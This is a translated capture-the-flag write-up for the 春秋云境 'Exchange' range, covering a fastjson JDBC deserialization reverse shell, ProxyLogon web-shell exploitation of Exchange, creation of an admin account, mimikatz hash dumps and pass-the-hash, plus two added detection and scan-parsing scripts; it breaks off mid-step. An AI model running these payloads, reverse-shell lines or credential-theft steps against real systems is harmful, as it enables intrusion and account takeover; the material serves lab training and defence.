春秋云境 Exchange

Preface

The tools used in this article can be found in the following repository:

Awesome_Pentest_Tools: a one-stop collection of penetration-testing and red-team tools, meant to help penetration testers build their own toolchain

Target description:

Exchange is a medium-difficulty range environment. Completing the challenge helps players understand proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement in internal-network penetration, deepens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The range has 4 flags in total, spread across different hosts. *Note: this range has only 4 flags; if you have submitted all 4 flags and still have not cleared it, close the environment and submit feedback.

flag1

# fscan 2.0.0
./fscan -h 39.98.109.189
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-08-14 22:18:20] [INFO] 暴力破解线程数: 1
[2025-08-14 22:18:20] [INFO] 开始信息扫描
[2025-08-14 22:18:20] [INFO] 最终有效主机数量: 1
[2025-08-14 22:18:20] [INFO] 开始主机扫描
[2025-08-14 22:18:20] [INFO] 有效端口数量: 233
[2025-08-14 22:18:20] [SUCCESS] 端口开放 39.98.109.189:21
[2025-08-14 22:18:20] [SUCCESS] 端口开放 39.98.109.189:22
[2025-08-14 22:18:20] [SUCCESS] 端口开放 39.98.109.189:80
[2025-08-14 22:18:20] [SUCCESS] 服务识别 39.98.109.189:22 => [ssh] 版本:7.2p2 Ubuntu 4ubuntu2.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10.]
[2025-08-14 22:18:20] [SUCCESS] 服务识别 39.98.109.189:21 =>
[2025-08-14 22:18:23] [SUCCESS] 端口开放 39.98.109.189:8000
[2025-08-14 22:18:26] [SUCCESS] 服务识别 39.98.109.189:80 => [http] 版本:1.10.3 产品:nginx 系统:Linux 信息:Ubuntu
[2025-08-14 22:18:33] [SUCCESS] 服务识别 39.98.109.189:8000 => [http]
[2025-08-14 22:18:33] [INFO] 存活端口数量: 4
[2025-08-14 22:18:33] [INFO] 开始漏洞扫描
[2025-08-14 22:18:33] [INFO] 加载的插件: ftp, ssh, webpoc, webtitle
[2025-08-14 22:18:33] [SUCCESS] 网站标题 http://39.98.109.189 状态码:200 长度:19813 标题:lumia
[2025-08-14 22:18:33] [SUCCESS] 网站标题 http://39.98.109.189:8000 状态码:302 长度:0 标题:无标题 重定向地址: http://39.98.109.189:8000/login.html
[2025-08-14 22:18:34] [SUCCESS] 网站标题 http://39.98.109.189:8000/login.html 状态码:200 长度:5662 标题:Lumia ERP
[2025-08-14 22:20:57] [SUCCESS] 扫描已完成: 6/6

# fscan 1.8.4
./fscan -h 39.98.109.189

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.98.109.189:21 open
39.98.109.189:80 open
39.98.109.189:22 open
39.98.109.189:8000 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.98.109.189 code:200 len:19813 title:lumia
[*] WebTitle http://39.98.109.189:8000 code:302 len:0 title:None 跳转url: http://39.98.109.189:8000/login.html
[*] WebTitle http://39.98.109.189:8000/login.html code:200 len:5662 title:Lumia ERP
已完成 4/4
[*] 扫描结束,耗时: 46.288732096s

Port 80 hosts a product-introduction website; port 8000 should be the site's admin backend.

Weak-password login:

admin:123456

A user can also be registered.

We are in the backend. Once inside, clicking "official plugins" (官方插件) at the top right redirected to 华夏ERP (jshERP), so the next step was to look for known vulnerabilities in 华夏ERP.

华夏ERP v2.3 contains a fastjson deserialization vulnerability: with evil-mysql-server and ysoserial a malicious MySQL server can be stood up and reached through JDBC:

Java Code Audit: 华夏 ERP CMS v2.3 - FreeBuf (cybersecurity industry portal)

# run on the VPS
./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-all.jar

# payload
bash -i >& /dev/tcp/公网IP/54500 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx
{
"name": {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "公网IP",
"portToConnectTo": 3306,
"info": {
"user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx}|{base64,-d}|{bash,-i}",
"password": "pass",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
}
}
}
# or
{
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "公网IP",
"portToConnectTo": 3306,
"info": {
"user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx}|{base64,-d}|{bash,-i}",
"password": "pass",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
},
"databaseToConnectTo": "dbname",
"url": ""
}

# the request can be sent with Burp
GET /register.html/../user/list?search={
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "公网IP",
"portToConnectTo": 3306,
"info": {
"user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx}|{base64,-d}|{bash,-i}",
"password": "pass",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
},
"databaseToConnectTo": "dbname",
"url": ""
} HTTP/1.1
Host: 39.98.109.189:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: JSESSIONID=7C6C92CE236FFAEE4E7FC06FF8EAF933
If-Modified-Since: Fri, 29 Jul 2022 07:23:14 GMT
Connection: close
# Of course the payload can also be sent directly via GET: log in first, then pass the parameter with HackBar
http://39.98.109.189:8000/register.html/../user/list?search=%7b%0a%20%20%20%20%22%40%74%79%70%65%22%3a%20%22%6a%61%76%61%2e%6c%61%6e%67%2e%41%75%74%6f%43%6c%6f%73%65%61%62%6c%65%22%2c%0a%20%20%20%20%22%40%74%79%70%65%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%4a%44%42%43%34%43%6f%6e%6e%65%63%74%69%6f%6e%22%2c%0a%20%20%20%20%22%68%6f%73%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%34%37%2e%39%34%2e%37%34%2e%32%33%22%2c%0a%20%20%20%20%22%70%6f%72%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%33%33%30%36%2c%0a%20%20%20%20%22%69%6e%66%6f%22%3a%20%7b%0a%20%20%20%20%20%20%20%20%22%75%73%65%72%22%3a%20%22%79%73%6f%5f%43%6f%6d%6d%6f%6e%73%43%6f%6c%6c%65%63%74%69%6f%6e%73%36%5f%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%30%4e%79%34%35%4e%43%34%33%4e%43%34%79%4d%79%38%31%4e%44%55%77%4d%43%41%77%50%69%59%78%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%22%2c%0a%20%20%20%20%20%20%20%20%22%70%61%73%73%77%6f%72%64%22%3a%20%22%70%61%73%73%22%2c%0a%20%20%20%20%20%20%20%20%22%73%74%61%74%65%6d%65%6e%74%49%6e%74%65%72%63%65%70%74%6f%72%73%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%69%6e%74%65%72%63%65%70%74%6f%72%73%2e%53%65%72%76%65%72%53%74%61%74%75%73%44%69%66%66%49%6e%74%65%72%63%65%70%74%6f%72%22%2c%0a%20%20%20%20%20%20%20%20%22%61%75%74%6f%44%65%73%65%72%69%61%6c%69%7a%65%22%3a%20%22%74%72%75%65%22%2c%0a%20%20%20%20%20%20%20%20%22%4e%55%4d%5f%48%4f%53%54%53%22%3a%20%22%31%22%0a%20%20%20%20%7d%2c%0a%20%20%20%20%22%64%61%74%61%62%61%73%65%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%64%62%6e%61%6d%65%22%2c%0a%20%20%20%20%22%75%72%6c%22%3a%20%22%22%0a%7d

This gives a root shell directly.
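From the defender's side, the request above has clear fingerprints: a `search` parameter whose JSON carries `@type` keys (fastjson autotype), a `com.mysql.` connection class, and the Connector/J properties `autoDeserialize` and `statementInterceptors` that make the driver deserialize server-supplied bytes. The following Python script is an added example, not code from the original post or from 华夏ERP: it percent-decodes request lines, flags those markers, and reports the `/../` path segment used above. The sample requests are constructed here from the JSON on this page, with the attacker host replaced by a placeholder and the ysoserial command removed; `queryInterceptors` is included because it is the Connector/J 8 name for the interceptor property.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote, quote

# MySQL Connector/J properties that make the client deserialize server-supplied Java objects.
# autoDeserialize and statementInterceptors appear in the request above; queryInterceptors is
# the Connector/J 8 name for the interceptor property.
DANGEROUS_PROPS = ("autoDeserialize", "statementInterceptors", "queryInterceptors")
TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')


def inspect_value(value):
    """Return a list of findings for one fully decoded parameter value."""
    findings = []
    types = TYPE_RE.findall(value)  # fastjson accepts repeated keys, so scan instead of json.loads
    if types:
        findings.append(f"fastjson autotype key(s): {types}")
    if any(t.startswith("com.mysql.") for t in types):
        findings.append("JDBC connection class in @type")
    props = [p for p in DANGEROUS_PROPS if f'"{p}"' in value]
    if props:
        findings.append(f"Connector/J deserialization properties: {props}")
    return findings


def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (payloads are sometimes double-encoded)."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def inspect_request_line(request_line):
    """Parse 'METHOD URI HTTP/x' and return (path, findings)."""
    _method, uri, _version = request_line.split(" ", 2)
    parts = urlsplit(uri)
    findings = []
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        for v in values:
            findings.extend(f"{key}: {f}" for f in inspect_value(fully_unquote(v)))
    if "/../" in parts.path:
        findings.append("path contains a /../ segment")
    return parts.path, findings


def scan_requests(lines):
    """Return [(index, path, findings)] for every request line with at least one finding."""
    hits = []
    for i, line in enumerate(lines):
        path, findings = inspect_request_line(line)
        if findings:
            hits.append((i, path, findings))
    return hits


# Constructed sample: the JSON from the request above, with the attacker host replaced by a
# placeholder and the ysoserial command removed, URL-encoded the way HackBar/Burp would send it.
PAYLOAD_JSON = (
    '{"@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", '
    '"hostToConnectTo": "ATTACKER_HOST_PLACEHOLDER", "portToConnectTo": 3306, '
    '"info": {"user": "<omitted>", "password": "pass", '
    '"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", '
    '"autoDeserialize": "true", "NUM_HOSTS": "1"}, "databaseToConnectTo": "dbname", "url": ""}'
)
SAMPLE_REQUESTS = [
    f"GET /register.html/../user/list?search={quote(PAYLOAD_JSON)} HTTP/1.1",
    "GET /user/list?search=lumia HTTP/1.1",   # benign search
    "GET /login.html HTTP/1.1",               # no query string at all
]

if __name__ == "__main__":
    for index, path, findings in scan_requests(SAMPLE_REQUESTS):
        print(f"request #{index} {path}")
        for finding in findings:
            print("   ", finding)
```

Alerting on `@type` alone is noisy for applications that legitimately use autotype; the high-confidence signal is its combination with a `com.mysql.` class or the Connector/J properties. The root-cause fix is on the application side: fastjson's safeMode (`ParserConfig.getGlobalInstance().setSafeMode(true)`, available from 1.2.68) disables autotype entirely, and user-controlled input should never reach the parser with autotype enabled.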

cat /root/flag/flag01.txt

██ ██ ██ ██ ███████ ███████ ██ ████ ██ ████████
░░██ ██ ░██ ████ ██░░░░░██ ░██░░░░██ ████ ░██░██ ░██ ██░░░░░░██
░░██ ██ ░██ ██░░██ ██ ░░██░██ ░██ ██░░██ ░██░░██ ░██ ██ ░░
░░███ ░██ ██ ░░██ ░██ ░██░███████ ██ ░░██ ░██ ░░██ ░██░██
██░██ ░██ ██████████░██ ░██░██░░░██ ██████████░██ ░░██░██░██ █████
██ ░░██ ░██░██░░░░░░██░░██ ██ ░██ ░░██ ░██░░░░░░██░██ ░░████░░██ ░░░░██
██ ░░██░██░██ ░██ ░░███████ ░██ ░░██░██ ░██░██ ░░███ ░░████████
░░ ░░ ░░ ░░ ░░ ░░░░░░░ ░░ ░░ ░░ ░░ ░░ ░░░ ░░░░░░░░

| | || | /~~\ /\ |\ /|~|~
| | ||--|| |/__\ | \/ | |
\/ \/ | | \__// \| |_|_

flag01: flag{9df584ea-34d7-4d2b-9b71-5b746b2c6e30}

flag2

Transfer the tools with wget

wget http://公网IP:8000/fscan
wget http://公网IP:8000/msf/mb22
wget http://公网IP:8000/linux_x64_agent
chmod +x linux_x64_agent mb22

Make them executable and get a session in msf

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 39.98.109.189
set LPORT 54522
run

./linux_x64_agent -l 54523 -s matrix

./linux_x64_admin -c 39.98.109.189:54523 -s matrix

Check the network segment and scan it with fscan

ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3e:34:e1:e1
inet addr:172.22.3.12 Bcast:172.22.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:3eff:fe34:e1e1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:951314 errors:0 dropped:0 overruns:0 frame:0
TX packets:752379 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:494361845 (494.3 MB) TX bytes:304273385 (304.2 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:30870 errors:0 dropped:0 overruns:0 frame:0
TX packets:30870 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:14953460 (14.9 MB) TX bytes:14953460 (14.9 MB)


./fscan -h 172.22.3.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.3.12 is alive
(icmp) Target 172.22.3.2 is alive
(icmp) Target 172.22.3.9 is alive
(icmp) Target 172.22.3.26 is alive
[*] Icmp alive hosts len is: 4
172.22.3.2:88 open
172.22.3.9:808 open
172.22.3.9:139 open
172.22.3.2:139 open
172.22.3.26:135 open
172.22.3.12:8000 open
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.26:139 open
172.22.3.9:135 open
172.22.3.2:135 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.9:8172 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo
[*]172.22.3.2
[->]XIAORANG-WIN16
[->]172.22.3.2
[*] NetInfo
[*]172.22.3.26
[->]XIAORANG-PC
[->]172.22.3.26
[*] OsInfo 172.22.3.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.3.26 XIAORANG\XIAORANG-PC
[*] NetBios 172.22.3.2 [+] DC:XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetInfo
[*]172.22.3.9
[->]XIAORANG-EXC01
[->]172.22.3.9
[*] WebTitle http://172.22.3.12:8000 code:302 len:0 title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle http://172.22.3.9 code:403 len:0 title:None
[*] WebTitle http://172.22.3.12 code:200 len:19813 title:lumia
[*] WebTitle http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP
[*] WebTitle http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook
已完成 18/18
[*] 扫描结束,耗时: 9.171102981s

Summary

(icmp) Target 172.22.3.12   compromised
(icmp) Target 172.22.3.2    XIAORANG-WIN16.xiaorang.lab, DC, Windows Server 2016 Datacenter
(icmp) Target 172.22.3.9    XIAORANG-EXC01.xiaorang.lab, Exchange mail server (EXC01), Windows Server 2016 Datacenter
(icmp) Target 172.22.3.26   XIAORANG\XIAORANG-PC, Windows Server 2016 Datacenter
  • 172.22.3.2: 88, 139, 445, 135
  • 172.22.3.9: 808, 139, 445, 443, 135, 81, 80, 8172
  • 172.22.3.12: 8000, 80, 22
  • 172.22.3.26: 135, 445, 139
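The summary above was compiled by hand from the scan output. The following Python script is an added example, not code from the original post or from fscan, that builds the same per-host inventory from fscan 1.8.4 output lines: alive hosts, open ports, NetBIOS names, the `DC:` tag and an OWA redirect. The sample input is a constructed excerpt of the scan output above; the role labels (DC from port 88 or the `DC:` tag, Exchange from an `/owa/` redirect, Linux from SSH on 22) are heuristics chosen here, not fscan's own classification.

```python
import re

ALIVE_RE = re.compile(r"^\(icmp\) Target (\S+) is alive")
PORT_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+):(\d+) open")
OSINFO_RE = re.compile(r"^\[\*\] OsInfo (\S+) \((.*)\)$")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios (\S+) (.*)$")
WEB_RE = re.compile(r"^\[\*\] WebTitle (\S+)")
IP_IN_URL_RE = re.compile(r"//(\d+\.\d+\.\d+\.\d+)")


def _host(hosts, ip):
    return hosts.setdefault(ip, {"ports": set(), "name": None, "os": None, "dc": False, "owa": False})


def parse_fscan(text):
    """Parse fscan 1.8.4 output into {ip: {ports, name, os, dc, owa}}."""
    hosts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if m := ALIVE_RE.match(line):
            _host(hosts, m.group(1))
        elif m := PORT_RE.match(line):
            _host(hosts, m.group(1))["ports"].add(int(m.group(2)))
        elif m := OSINFO_RE.match(line):
            _host(hosts, m.group(1))["os"] = m.group(2)
        elif m := NETBIOS_RE.match(line):
            ip, rest = m.groups()
            rec = _host(hosts, ip)
            if rest.startswith("[+] DC:"):          # fscan tags the domain controller this way
                rec["dc"] = True
                rest = rest[len("[+] DC:"):]
            name, _, os_text = rest.partition(" ")
            rec["name"] = name
            if os_text and rec["os"] is None:
                rec["os"] = os_text
        elif m := WEB_RE.match(line):
            ip_match = IP_IN_URL_RE.search(m.group(1))
            if ip_match and "/owa/" in line:        # redirect to Outlook Web App marks an Exchange server
                _host(hosts, ip_match.group(1))["owa"] = True
    return hosts


def roles(rec):
    """Heuristic role labels for one host record (chosen here, not fscan's own output)."""
    out = []
    if rec["dc"] or 88 in rec["ports"]:
        out.append("DC")
    if rec["owa"]:
        out.append("Exchange/OWA")
    if 22 in rec["ports"]:
        out.append("Linux/SSH")
    return out


def summarize(hosts):
    """One line per host, sorted by IP, in the style of the summary block above."""
    lines = []
    for ip in sorted(hosts, key=lambda s: tuple(int(o) for o in s.split("."))):
        rec = hosts[ip]
        ports = ", ".join(str(p) for p in sorted(rec["ports"]))
        lines.append(f"{ip:<13} {rec['name'] or '-':<30} {'/'.join(roles(rec)) or '-':<14} "
                     f"{rec['os'] or '-':<40} ports: {ports}")
    return lines


# Constructed sample: an excerpt of the fscan 1.8.4 output shown above.
SAMPLE_OUTPUT = """\
(icmp) Target 172.22.3.12 is alive
(icmp) Target 172.22.3.2 is alive
(icmp) Target 172.22.3.9 is alive
(icmp) Target 172.22.3.26 is alive
172.22.3.2:88 open
172.22.3.9:808 open
172.22.3.2:445 open
172.22.3.26:135 open
172.22.3.12:8000 open
172.22.3.9:443 open
172.22.3.12:22 open
[*] OsInfo 172.22.3.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.3.26 XIAORANG\\XIAORANG-PC
[*] NetBios 172.22.3.2 [+] DC:XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
"""

if __name__ == "__main__":
    for line in summarize(parse_fscan(SAMPLE_OUTPUT)):
        print(line)
```

The same inventory is what an internal asset review produces from a scan of its own ranges: a host answering on 88 without being a registered DC, or an unexpected OWA endpoint, is exactly the kind of discrepancy worth chasing.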

Exchange Server

172.22.3.9 hosts Outlook Web App (an Exchange service)

  • Outlook usually refers to Microsoft's e-mail client (a desktop application), available on Windows, Mac, mobile and other platforms. Functions: sending and receiving mail, calendar, contacts, tasks, meetings and other collaboration features.
  • Outlook Web Access (OWA), now more commonly called Outlook Web App, is the browser-based mailbox interface of Microsoft's Exchange mail server. Functions: lets users reach their corporate mailbox through a browser to send and receive mail and check the calendar, contacts and tasks, without installing a client.


exprolog

Guessing that the mail domain is xiaorang.lab: admin@xiaorang.lab did not work, administrator@xiaorang.lab did.

herwonowr/exprolog: ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

Use exprolog.py to write a web shell

proxychains python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab

proxychains python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
_____ ____ _
| ____|_ _| _ \ _ __ ___ | | ___ __ _
| _| \ \/ / |_) | '__/ _ \| |/ _ \ / _` |
| |___ > <| __/| | | (_) | | (_) | (_| |
|_____/_/\_\_| |_| \___/|_|\___/ \__, |
|___/

[#] Trying to get target FQDN
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.9:443 ... OK
[+] Got target FQDN: XIAORANG-EXC01
[#] Trying to get target LegacyDN and ServerID
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.9:443 ... OK
[+] Got target LegacyDN: /o=XIAORANG LAB/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=8ca6ff254802459d9f63ee916eabb487-Administrat
[+] Got target ServerID: b5ebdaa1-b4b3-4b71-ab32-7d03b4955a75
[#] Trying to get target user SID
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.9:443 ... OK
[+] Got target administrator SID: S-1-5-21-533686307-2117412543-4200729784-500
[#] Trying to get target administrator cookie sessions
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.9:443 ... OK
[+] Got target administrator session ID: 85342402-4794-4ac5-b523-10409dde4dee
[+] Got target administrator canary session ID: vlBxSIptCUKhHxHNUx346Iq2f4Td3N0IcbfRsJDvBOhOJslBwFY7TEoZxQU_hWE20FwAyipvZ8M.
[#] Trying to get target OABVirtualDirectory ID
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.9:443 ... OK
[+] Got target AOB ID: afb15058-823b-4c37-ab8d-3012667a7d6b
[#] Trying to inject OABVirtualDirectory Shell
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.9:443 ... OK
[+] Shell are injected
[#] Verifying OABVirtualDirectory Shell
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.9:443 ... OK
[+] AOB Shell verified
[+] AOB Shell payload: http:\/\/ooo\/#%3Cscript%20language=%22JScript%22%20runat=%22server%22%3Efunction%20Page_Load()%7Beval(Request%5B%22request%22%5D,%22unsafe%22);%7D%3C\/script%3E
[#] Trying to export OABVirtualDirectory Shell
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.9:443 ... OK
[+] Shell are exported
[*] CURL Request:
curl --request POST --url https://172.22.3.9/owa/auth/v5mts.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k
[*] DONE

The tool's output prints the payload directly, so we connect to the web shell with the command it gives:

proxychains curl --request POST --url https://172.22.3.9/owa/auth/ca3hs.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k  

proxylogon

RickGeex/ProxyLogon: ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution.

With proxylogon we get command execution directly

proxychains python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

msf

msf can also be used:

  • exploit/windows/http/exchange_proxylogon_rce: remote code execution through the ProxyLogon vulnerability (the latest module library must be loaded).
  • exploit/windows/http/exchange_proxyshell_rce: uses the ProxyShell vulnerability against newer Exchange versions.
use exploit/windows/http/exchange_proxylogon_rce
set RHOSTS 172.22.3.9
set RPORT 443 # the default Exchange web service port is 443; change it if the target uses another port
set EMAIL administrator@xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54530
run

use exploit/windows/http/exchange_proxyshell_rce
set RHOSTS 172.22.3.9
set EMAIL administrator@xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54531
run

We can create a user and connect over RDP

net user matrix Matrix2025! /add
net localgroup administrators matrix /add
net user matrix /domain
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

# Do not specify the domain here: with the domain set the connection fails. If you don't need Kerberos/domain authentication, try without the /d: parameter
proxychains xfreerdp3 /u:matrix /p:Matrix2025! /d:xiaorang.lab /v:172.22.3.9 /cert:ignore
proxychains xfreerdp3 /u:matrix /p:Matrix2025! /v:172.22.3.9 /cert:ignore

Get the flag

flag4

If you did not use msf earlier, you can plant a backdoor now

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 172.22.3.9
set LPORT 54524
run

I wanted to analyse the domain at this point, but since the user we created is not a domain user, BloodHound collected nothing.

logonpasswords

mimikatz

Next, upload mimikatz and dump the hashes.

mimikatz must be run as administrator.

log
privilege::Debug # this command fails, but it does not matter
sekurlsa::logonpasswords
exit

kiwi_cmd "sekurlsa::logonpasswords": the classic Mimikatz command for dumping the plaintext passwords, hashes, tickets and so on of every account currently logged on to the host

msf

It can also be loaded through msf

load kiwi
kiwi_cmd "privilege::debug"
kiwi_cmd "sekurlsa::logonpasswords"

Two useful hashes were captured:

one for the machine account, one for the user Zhangtong

Authentication Id : 0 ; 1887841 (00000000:001cce61)
Session : RemoteInteractive from 2
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/8/15 20:20:16
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/8/15 20:18:43
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 766a276a053f370d92eaf25c243f1124
* SHA1 : de47c096cd43e244984f43517ae52678d06318da
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

We can pass the hash, again with msf or impacket. For more PTH methods see the article 域渗透基础 (Domain Penetration Basics) by 重庆森林不在重庆.

proxychains impacket-psexec xiaorang.lab/XIAORANG-EXC01\$@172.22.3.9 -hashes ':766a276a053f370d92eaf25c243f1124' -codec gbk


use exploit/windows/smb/psexec
set RHOSTS 172.22.3.9
set SMBUser XIAORANG-EXC01$
